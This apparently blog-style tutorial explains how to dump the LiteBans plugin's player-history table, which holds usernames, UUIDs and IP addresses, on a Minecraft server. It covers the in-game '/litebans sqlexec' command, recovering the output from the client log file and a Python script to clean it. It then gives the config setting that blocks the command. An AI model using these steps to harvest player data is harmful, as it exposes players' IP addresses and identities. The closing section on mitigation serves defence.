LiteBans is a popular and paid banning plugin for server moderators and administrators. When installing LiteBans on your server, the plugin creates a local MySQL server for storing player data and punishments.
MySQL is one of the most used database management systems, used to store data in tables. MySQL supports SQL queries, which are commands or statements that access or modify data in a database.
Examples of SQL queries:
SELECT * FROM my_table;returns everything that's stored in the table my_table.SELECT email, password FROM my_table;returns emails and passwords that's stored in the table my_table.
A feature in the plugin makes you able to execute SQL queries through an ingame command. You can exploit this feature, to dump the server's player data database. Of course, this command requires administrator permissions to use.
The plugin creates seven tables in the database:
- litebans_bans
- litebans_history
- litebans_kicks
- litebans_mutes
- litebans_servers
- litebans_sync
- litebans_warnings
The table litebans_history contains all player data (last seen date, username, UUID and IP-address), which is the table you want to dump.
Simply execute the command /litebans sqlexec SELECT * FROM litebans_history;. The command will execute the SQL query and take everything that's stored in the SQL table litebans_history and display it in the ingame chat.
To get access to the database content, go to the latest client log file located at %appdata%\.minecraft\logs\latest.log on your computer and copy the dumped database table from start to finish.
The database should look like something like this, in the latest.log file:
[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+---------+------------------------------------+------------+
[22:31:26] [Client thread/INFO]: [CHAT] |ID|DATE |NAME |UUID |IP |
[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+---------+------------------------------------+------------+
[22:31:26] [Client thread/INFO]: [CHAT] |1 |2020-04-17 13:22:38.924|CONSOLE |CONSOLE |# |
[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+---------+------------------------------------+------------+
[22:31:26] [Client thread/INFO]: [CHAT] |2 |2020-04-17 13:24:39.78 |GayCumAss|4fd3a2a8-bfe6-4144-94ac-bd04bb2e505b|127.0.0.1 |
[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+---------+------------------------------------+------------+
[22:31:26] [Client thread/INFO]: [CHAT] |3 |2020-04-17 13:25:58.758|wodx |8b476e65-a1c9-4677-867b-6712382c537f|127.0.0.1 |
[22:31:26] [Client thread/INFO]: [CHAT] +--+-----------------------+---------+------------------------------------+------------+
You can use this simple Python tool to remove the client log format from the dumped database:
def main():
lines = [x.strip() for x in open(input("Database path > "), encoding="utf-8", errors="ignore").readlines() if x.strip()]
with open("out.txt", "w") as file:
for line in lines:
file.write(line.split("[CHAT] ")[1] + "\n")
if __name__ == "__main__":
main()In the update LiteBans 2.3.10 - 2.3.15, a security patch was added. The configuration security.sqlexec was now set to true by default, which means only the console can use the sqlexec feature.
To prevent your server from getting its database dumped, set the security feature security.sqlexec to true in the configuration file of LiteBans located at ./plugins/LiteBans/config.yml.
This configuration change will block players from using the command /litebans sqlexec.
security:
# If enabled, only the console can see IP addresses in /dupeip output.
# This does not prevent players from using /dupeip. It only prevents them from seeing IP addresses.
dupeip: true
# If enabled, only the console can use /iphistory.
iphistory: true
# If enabled, only the console can use "/litebans sqlexec".
sqlexec: true